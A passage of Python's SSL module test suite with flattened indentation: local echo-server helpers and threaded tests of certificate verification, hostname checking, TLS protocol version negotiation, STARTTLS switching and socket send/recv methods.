self.certfile = certfile
sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.port = socket_helper.bind_port(sock, '')
asyncore.dispatcher.__init__(self, sock)
self.listen(5)
def handle_accepted(self, sock_obj, addr):
if support.verbose:
sys.stdout.write(" server: new connection from %s:%s\n" %addr)
self.ConnectionHandler(sock_obj, self.certfile)
def handle_error(self):
raise
def __init__(self, certfile):
self.flag = None
self.active = False
self.server = self.EchoServer(certfile)
self.port = self.server.port
threading.Thread.__init__(self)
self.daemon = True
def __str__(self):
return "<%s %s>" % (self.__class__.__name__, self.server)
def __enter__(self):
self.start(threading.Event())
self.flag.wait()
return self
def __exit__(self, *args):
if support.verbose:
sys.stdout.write(" cleanup: stopping server.\n")
self.stop()
if support.verbose:
sys.stdout.write(" cleanup: joining server thread.\n")
self.join()
if support.verbose:
sys.stdout.write(" cleanup: successfully joined.\n")
# make sure that ConnectionHandler is removed from socket_map
asyncore.close_all(ignore_all=True)
    def start(self, flag=None):
self.flag = flag
threading.Thread.start(self)
def run(self):
self.active = True
if self.flag:
self.flag.set()
while self.active:
try:
asyncore.loop(1)
except:
pass
def stop(self):
self.active = False
self.server.close()
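# Typical use of server_params_test(), as a sketch mirroring the calls made
# in the tests below:
#
#   client_ctx, server_ctx, hostname = testing_context()
#   stats = server_params_test(client_ctx, server_ctx, sni_name=hostname)
#   stats['version']    # e.g. 'TLSv1.3'
#   stats['cipher']     # (name, protocol, secret_bits) from SSLSocket.cipher()
#
# The full set of keys is the stats.update(...) call below plus the two
# server-side entries added just before the function returns.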
def server_params_test(client_context, server_context, indata=b"FOO\n",
chatty=True, connectionchatty=False, sni_name=None,
session=None):
"""
Launch a server, connect a client to it and try various reads
and writes.
"""
stats = {}
server = ThreadedEchoServer(context=server_context,
chatty=chatty,
connectionchatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=sni_name, session=session) as s:
s.connect((HOST, server.port))
for arg in [indata, bytearray(indata), memoryview(indata)]:
if connectionchatty:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(arg)
outdata = s.read()
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
raise AssertionError(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if connectionchatty:
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
stats.update({
'compression': s.compression(),
'cipher': s.cipher(),
'peercert': s.getpeercert(),
'client_alpn_protocol': s.selected_alpn_protocol(),
'version': s.version(),
'session_reused': s.session_reused,
'session': s.session,
})
s.close()
stats['server_alpn_protocols'] = server.selected_alpn_protocols
stats['server_shared_ciphers'] = server.shared_ciphers
return stats
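# Example (taken from the protocol tests below): run a PROTOCOL_TLSv1_2
# client against a PROTOCOL_TLS server and assert that TLS 1.2 is the
# version actually negotiated:
#
#   try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')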
def try_protocol_combo(server_protocol, client_protocol, expect_success,
certsreqs=None, server_options=0, client_options=0):
"""
Try to SSL-connect using *client_protocol* to *server_protocol*.
    If *expect_success* is true, assert that the connection succeeds;
    if it's false, assert that the connection fails.
Also, if *expect_success* is a string, assert that it is the protocol
version actually used by the connection.
"""
if certsreqs is None:
certsreqs = ssl.CERT_NONE
certtype = {
ssl.CERT_NONE: "CERT_NONE",
ssl.CERT_OPTIONAL: "CERT_OPTIONAL",
ssl.CERT_REQUIRED: "CERT_REQUIRED",
}[certsreqs]
if support.verbose:
formatstr = (expect_success and " %s->%s %s\n") or " {%s->%s} %s\n"
sys.stdout.write(formatstr %
(ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol),
certtype))
with warnings_helper.check_warnings():
# ignore Deprecation warnings
client_context = ssl.SSLContext(client_protocol)
client_context.options |= client_options
server_context = ssl.SSLContext(server_protocol)
server_context.options |= server_options
min_version = PROTOCOL_TO_TLS_VERSION.get(client_protocol, None)
if (min_version is not None
# SSLContext.minimum_version is only available on recent OpenSSL
# (setter added in OpenSSL 1.1.0, getter added in OpenSSL 1.1.1)
and hasattr(server_context, 'minimum_version')
and server_protocol == ssl.PROTOCOL_TLS
and server_context.minimum_version > min_version
):
# If OpenSSL configuration is strict and requires more recent TLS
# version, we have to change the minimum to test old TLS versions.
with warnings_helper.check_warnings():
server_context.minimum_version = min_version
# NOTE: we must enable "ALL" ciphers on the client, otherwise an
# SSLv23 client will send an SSLv3 hello (rather than SSLv2)
# starting from OpenSSL 1.0.0 (see issue #8322).
if client_context.protocol == ssl.PROTOCOL_TLS:
client_context.set_ciphers("ALL")
seclevel_workaround(server_context, client_context)
for ctx in (client_context, server_context):
ctx.verify_mode = certsreqs
ctx.load_cert_chain(SIGNED_CERTFILE)
ctx.load_verify_locations(SIGNING_CA)
try:
stats = server_params_test(client_context, server_context,
chatty=False, connectionchatty=False)
# Protocol mismatch can result in either an SSLError, or a
# "Connection reset by peer" error.
except ssl.SSLError:
if expect_success:
raise
except OSError as e:
if expect_success or e.errno != errno.ECONNRESET:
raise
else:
if not expect_success:
raise AssertionError(
"Client protocol %s succeeded with server protocol %s!"
% (ssl.get_protocol_name(client_protocol),
ssl.get_protocol_name(server_protocol)))
elif (expect_success is not True
and expect_success != stats['version']):
raise AssertionError("version mismatch: expected %r, got %r"
% (expect_success, stats['version']))
class ThreadedTests(unittest.TestCase):
def test_echo(self):
"""Basic test of an SSL client connecting to a server"""
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_SERVER):
server_params_test(client_context=client_context,
server_context=server_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
client_context.check_hostname = False
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True,
sni_name=hostname)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_SERVER, server=ssl.PROTOCOL_TLS_SERVER):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=server_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
with self.subTest(client=ssl.PROTOCOL_TLS_CLIENT, server=ssl.PROTOCOL_TLS_CLIENT):
with self.assertRaises(ssl.SSLError) as e:
server_params_test(client_context=server_context,
server_context=client_context,
chatty=True, connectionchatty=True)
self.assertIn('called a function you should not call',
str(e.exception))
def test_getpeercert(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
server = ThreadedEchoServer(context=server_context, chatty=False)
with server:
with client_context.wrap_socket(socket.socket(),
do_handshake_on_connect=False,
server_hostname=hostname) as s:
s.connect((HOST, server.port))
                # getpeercert() raises ValueError until the handshake is
                # done.
with self.assertRaises(ValueError):
s.getpeercert()
s.do_handshake()
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()
if support.verbose:
sys.stdout.write(pprint.pformat(cert) + '\n')
sys.stdout.write("Connection cipher is " + str(cipher) + '.\n')
if 'subject' not in cert:
self.fail("No subject field in certificate: %s." %
pprint.pformat(cert))
if ((('organizationName', 'Python Software Foundation'),)
not in cert['subject']):
self.fail(
"Missing or invalid 'organizationName' field in certificate subject; "
"should be 'Python Software Foundation'.")
self.assertIn('notBefore', cert)
self.assertIn('notAfter', cert)
before = ssl.cert_time_to_seconds(cert['notBefore'])
after = ssl.cert_time_to_seconds(cert['notAfter'])
self.assertLess(before, after)
def test_crl_check(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
tf = getattr(ssl, "VERIFY_X509_TRUSTED_FIRST", 0)
self.assertEqual(client_context.verify_flags, ssl.VERIFY_DEFAULT | tf)
# VERIFY_DEFAULT should pass
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# VERIFY_CRL_CHECK_LEAF without a loaded CRL file fails
client_context.verify_flags |= ssl.VERIFY_CRL_CHECK_LEAF
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaisesRegex(ssl.SSLError,
"certificate verify failed"):
s.connect((HOST, server.port))
# now load a CRL file. The CRL file is signed by the CA.
client_context.load_verify_locations(CRLFILE)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
def test_check_hostname(self):
if support.verbose:
sys.stdout.write("\n")
client_context, server_context, hostname = testing_context()
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname="invalid") as s:
with self.assertRaisesRegex(
ssl.CertificateError,
"Hostname mismatch, certificate is not valid for 'invalid'."):
s.connect((HOST, server.port))
# missing server_hostname arg should cause an exception, too
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with socket.socket() as s:
with self.assertRaisesRegex(ValueError,
"check_hostname requires server_hostname"):
client_context.wrap_socket(s)
@unittest.skipUnless(
ssl.HAS_NEVER_CHECK_COMMON_NAME, "test requires hostname_checks_common_name"
)
def test_hostname_checks_common_name(self):
client_context, server_context, hostname = testing_context()
assert client_context.hostname_checks_common_name
client_context.hostname_checks_common_name = False
# default cert has a SAN
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
client_context, server_context, hostname = testing_context(NOSANFILE)
client_context.hostname_checks_common_name = False
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
with self.assertRaises(ssl.SSLCertVerificationError):
s.connect((HOST, server.port))
def test_ecc_cert(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC cert
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
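                # Note: assertTrue() with two arguments treats the second one
                # as the failure message, so this only checks that the split
                # produced a non-empty prefix (under TLS 1.3 the cipher name
                # is not of the 'ECDHE-ECDSA-...' form).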
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_dual_rsa_ecc(self):
client_context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
client_context.load_verify_locations(SIGNING_CA)
# TODO: fix TLSv1.3 once SSLContext can restrict signature
# algorithms.
client_context.options |= ssl.OP_NO_TLSv1_3
# only ECDSA certs
client_context.set_ciphers('ECDHE:ECDSA:!NULL:!aRSA')
hostname = SIGNED_CERTFILE_ECC_HOSTNAME
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
# load ECC and RSA key/cert pairs
server_context.load_cert_chain(SIGNED_CERTFILE_ECC)
server_context.load_cert_chain(SIGNED_CERTFILE)
# correct hostname should verify
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertTrue(cert, "Can't get peer certificate.")
cipher = s.cipher()[0].split('-')
self.assertTrue(cipher[:2], ('ECDHE', 'ECDSA'))
def test_check_hostname_idn(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(IDNSANSFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
context.verify_mode = ssl.CERT_REQUIRED
context.check_hostname = True
context.load_verify_locations(SIGNING_CA)
# correct hostname should verify, when specified in several
# different ways
idn_hostnames = [
('könig.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
(b'xn--knig-5qa.idn.pythontest.net',
'xn--knig-5qa.idn.pythontest.net'),
('königsgäßchen.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
('xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
(b'xn--knigsgsschen-lcb0w.idna2003.pythontest.net',
'xn--knigsgsschen-lcb0w.idna2003.pythontest.net'),
# ('königsgäßchen.idna2008.pythontest.net',
# 'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
('xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
(b'xn--knigsgchen-b4a3dun.idna2008.pythontest.net',
'xn--knigsgchen-b4a3dun.idna2008.pythontest.net'),
]
for server_hostname, expected_hostname in idn_hostnames:
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=server_hostname) as s:
self.assertEqual(s.server_hostname, expected_hostname)
s.connect((HOST, server.port))
cert = s.getpeercert()
self.assertEqual(s.server_hostname, expected_hostname)
self.assertTrue(cert, "Can't get peer certificate.")
# incorrect hostname should raise an exception
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname="python.example.org") as s:
with self.assertRaises(ssl.CertificateError):
s.connect((HOST, server.port))
def test_wrong_cert_tls12(self):
"""Connecting when the server rejects the client's certificate
Launch a server with CERT_REQUIRED, and check that trying to
connect to it with a wrong client certificate fails.
"""
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
# require TLS client authentication
server_context.verify_mode = ssl.CERT_REQUIRED
        # TLS 1.3 has a different handshake, so cap the client at TLS 1.2
client_context.maximum_version = ssl.TLSVersion.TLSv1_2
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
try:
# Expect either an SSL error about the server rejecting
# the connection, or a low-level connection reset (which
# sometimes happens on Windows)
s.connect((HOST, server.port))
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
self.fail("Use of invalid cert should have failed!")
@requires_tls_version('TLSv1_3')
def test_wrong_cert_tls13(self):
client_context, server_context, hostname = testing_context()
# load client cert that is not signed by trusted CA
client_context.load_cert_chain(CERTFILE)
server_context.verify_mode = ssl.CERT_REQUIRED
server_context.minimum_version = ssl.TLSVersion.TLSv1_3
client_context.minimum_version = ssl.TLSVersion.TLSv1_3
server = ThreadedEchoServer(
context=server_context, chatty=True, connectionchatty=True,
)
with server, \
client_context.wrap_socket(socket.socket(),
server_hostname=hostname) as s:
            # TLS 1.3 performs the client certificate exchange after the handshake
s.connect((HOST, server.port))
try:
s.write(b'data')
s.read(1000)
s.write(b'should have failed already')
s.read(1000)
except ssl.SSLError as e:
if support.verbose:
sys.stdout.write("\nSSLError is %r\n" % e)
except OSError as e:
if e.errno != errno.ECONNRESET:
raise
if support.verbose:
sys.stdout.write("\nsocket.error is %r\n" % e)
else:
if sys.platform == "win32":
self.skipTest(
"Ignoring failed test_wrong_cert_tls13 test case. "
"The test is flaky on Windows, see bpo-43921."
)
else:
self.fail("Use of invalid cert should have failed!")
def test_rude_shutdown(self):
"""A brutal shutdown of an SSL server should raise an OSError
in the client when attempting handshake.
"""
listener_ready = threading.Event()
listener_gone = threading.Event()
s = socket.socket()
port = socket_helper.bind_port(s, HOST)
# `listener` runs in a thread. It sits in an accept() until
# the main thread connects. Then it rudely closes the socket,
# and sets Event `listener_gone` to let the main thread know
# the socket is gone.
def listener():
s.listen()
listener_ready.set()
newsock, addr = s.accept()
newsock.close()
s.close()
listener_gone.set()
def connector():
listener_ready.wait()
with socket.socket() as c:
c.connect((HOST, port))
listener_gone.wait()
try:
ssl_sock = test_wrap_socket(c)
except OSError:
pass
else:
self.fail('connecting to closed SSL socket should have failed')
t = threading.Thread(target=listener)
t.start()
try:
connector()
finally:
t.join()
def test_ssl_cert_verify_error(self):
if support.verbose:
sys.stdout.write("\n")
server_context = ssl.SSLContext(ssl.PROTOCOL_TLS_SERVER)
server_context.load_cert_chain(SIGNED_CERTFILE)
context = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT)
server = ThreadedEchoServer(context=server_context, chatty=True)
with server:
with context.wrap_socket(socket.socket(),
server_hostname=SIGNED_CERTFILE_HOSTNAME) as s:
try:
s.connect((HOST, server.port))
except ssl.SSLError as e:
msg = 'unable to get local issuer certificate'
self.assertIsInstance(e, ssl.SSLCertVerificationError)
self.assertEqual(e.verify_code, 20)
self.assertEqual(e.verify_message, msg)
self.assertIn(msg, repr(e))
self.assertIn('certificate verify failed', repr(e))
@requires_tls_version('SSLv2')
def test_protocol_sslv2(self):
"""Connecting to an SSLv2 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv2, True, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLSv1, False)
# SSLv23 client with specific SSL options
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
def test_PROTOCOL_TLS(self):
"""Connecting to an SSLv23 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
if has_tls_version('SSLv2'):
try:
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv2, True)
except OSError as x:
# this fails on some older versions of OpenSSL (0.9.7l, for instance)
if support.verbose:
sys.stdout.write(
" SSL2 client to SSL23 server test unexpectedly failed:\n %s\n"
% str(x))
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1')
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_OPTIONAL)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False, ssl.CERT_REQUIRED)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True, ssl.CERT_REQUIRED)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
# Server with specific SSL options
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_SSLv3, False,
server_options=ssl.OP_NO_SSLv3)
        # With SSLv2/SSLv3 disabled, the highest mutually supported TLS
        # version is chosen
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLS, True,
server_options=ssl.OP_NO_SSLv2 | ssl.OP_NO_SSLv3)
if has_tls_version('TLSv1'):
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1, False,
server_options=ssl.OP_NO_TLSv1)
@requires_tls_version('SSLv3')
def test_protocol_sslv3(self):
"""Connecting to an SSLv3 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3')
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv3, 'SSLv3', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_SSLv2, False)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_SSLv3)
try_protocol_combo(ssl.PROTOCOL_SSLv3, ssl.PROTOCOL_TLSv1, False)
@requires_tls_version('TLSv1')
def test_protocol_tlsv1(self):
"""Connecting to a TLSv1 server with various client options"""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1')
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_OPTIONAL)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1, 'TLSv1', ssl.CERT_REQUIRED)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1)
@requires_tls_version('TLSv1_1')
def test_protocol_tlsv1_1(self):
"""Connecting to a TLSv1.1 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_1)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_1, 'TLSv1.1')
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
@requires_tls_version('TLSv1_2')
def test_protocol_tlsv1_2(self):
"""Connecting to a TLSv1.2 server with various client options.
Testing against older TLS versions."""
if support.verbose:
sys.stdout.write("\n")
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2',
server_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,
client_options=ssl.OP_NO_SSLv3|ssl.OP_NO_SSLv2,)
if has_tls_version('SSLv2'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv2, False)
if has_tls_version('SSLv3'):
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_SSLv3, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLS, False,
client_options=ssl.OP_NO_TLSv1_2)
try_protocol_combo(ssl.PROTOCOL_TLS, ssl.PROTOCOL_TLSv1_2, 'TLSv1.2')
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1, ssl.PROTOCOL_TLSv1_2, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_2, ssl.PROTOCOL_TLSv1_1, False)
try_protocol_combo(ssl.PROTOCOL_TLSv1_1, ssl.PROTOCOL_TLSv1_2, False)
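    # The STARTTLS exchange below mirrors the server side in
    # ThreadedEchoServer.ConnectionHandler.run(): the client sends
    # b"STARTTLS" in clear text, the server answers b"OK\n" and wraps its
    # socket, then the client wraps its own end; b"ENDTLS" unwraps both
    # ends again.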
def test_starttls(self):
"""Switching from clear text to encrypted and back again."""
msgs = (b"msg 1", b"MSG 2", b"STARTTLS", b"MSG 3", b"msg 4", b"ENDTLS", b"msg 5", b"msg 6")
server = ThreadedEchoServer(CERTFILE,
starttls_server=True,
chatty=True,
connectionchatty=True)
wrapped = False
with server:
s = socket.socket()
s.setblocking(True)
s.connect((HOST, server.port))
if support.verbose:
sys.stdout.write("\n")
for indata in msgs:
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
if wrapped:
conn.write(indata)
outdata = conn.read()
else:
s.send(indata)
outdata = s.recv(1024)
msg = outdata.strip().lower()
if indata == b"STARTTLS" and msg.startswith(b"ok"):
# STARTTLS ok, switch to secure mode
if support.verbose:
sys.stdout.write(
" client: read %r from server, starting TLS...\n"
% msg)
conn = test_wrap_socket(s)
wrapped = True
elif indata == b"ENDTLS" and msg.startswith(b"ok"):
# ENDTLS ok, switch back to clear text
if support.verbose:
sys.stdout.write(
" client: read %r from server, ending TLS...\n"
% msg)
s = conn.unwrap()
wrapped = False
else:
if support.verbose:
sys.stdout.write(
" client: read %r from server\n" % msg)
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
if wrapped:
conn.write(b"over\n")
else:
s.send(b"over\n")
if wrapped:
conn.close()
else:
s.close()
def test_socketserver(self):
"""Using socketserver to create and manage SSL connections."""
server = make_https_server(self, certfile=SIGNED_CERTFILE)
# try to connect
if support.verbose:
sys.stdout.write('\n')
with open(CERTFILE, 'rb') as f:
d1 = f.read()
        d2 = b''
# now fetch the same data from the HTTPS server
url = 'https://localhost:%d/%s' % (
server.port, os.path.split(CERTFILE)[1])
context = ssl.create_default_context(cafile=SIGNING_CA)
f = urllib.request.urlopen(url, context=context)
try:
dlen = f.info().get("content-length")
if dlen and (int(dlen) > 0):
d2 = f.read(int(dlen))
if support.verbose:
sys.stdout.write(
" client: read %d bytes from remote server '%s'\n"
% (len(d2), server))
finally:
f.close()
self.assertEqual(d1, d2)
def test_asyncore_server(self):
"""Check the example asyncore integration."""
if support.verbose:
sys.stdout.write("\n")
indata = b"FOO\n"
server = AsyncoreEchoServer(CERTFILE)
with server:
s = test_wrap_socket(socket.socket())
s.connect(('127.0.0.1', server.port))
if support.verbose:
sys.stdout.write(
" client: sending %r...\n" % indata)
s.write(indata)
outdata = s.read()
if support.verbose:
sys.stdout.write(" client: read %r\n" % outdata)
if outdata != indata.lower():
self.fail(
"bad data <<%r>> (%d) received; expected <<%r>> (%d)\n"
% (outdata[:20], len(outdata),
indata[:20].lower(), len(indata)))
s.write(b"over\n")
if support.verbose:
sys.stdout.write(" client: closing connection.\n")
s.close()
if support.verbose:
sys.stdout.write(" client: connection closed.\n")
def test_recv_send(self):
"""Test recv(), send() and friends."""
if support.verbose:
sys.stdout.write("\n")
server = ThreadedEchoServer(CERTFILE,
certreqs=ssl.CERT_NONE,
ssl_version=ssl.PROTOCOL_TLS_SERVER,
cacerts=CERTFILE,
chatty=True,
connectionchatty=False)
with server:
s = test_wrap_socket(socket.socket(),
server_side=False,
certfile=CERTFILE,
ca_certs=CERTFILE,
cert_reqs=ssl.CERT_NONE)
s.connect((HOST, server.port))
# helper methods for standardising recv* method signatures
def _recv_into():
b = bytearray(b"\0"*100)
count = s.recv_into(b)
return b[:count]
def _recvfrom_into():
b = bytearray(b"\0"*100)
count, addr = s.recvfrom_into(b)
return b[:count]
# (name, method, expect success?, *args, return value func)
send_methods = [
('send', s.send, True, [], len),
('sendto', s.sendto, False, ["some.address"], len),
('sendall', s.sendall, True, [], lambda x: None),
]
# (name, method, whether to expect success, *args)
recv_methods = [
('recv', s.recv, True, []),
('recvfrom', s.recvfrom, False, ["some.address"]),
('recv_into', _recv_into, True, []),
('recvfrom_into', _recvfrom_into, False, []),
]
data_prefix = "PREFIX_"
for (meth_name, send_meth, expect_success, args,
ret_val_meth) in send_methods:
indata = (data_prefix + meth_name).encode('ascii')
try:
ret = send_meth(indata, *args)
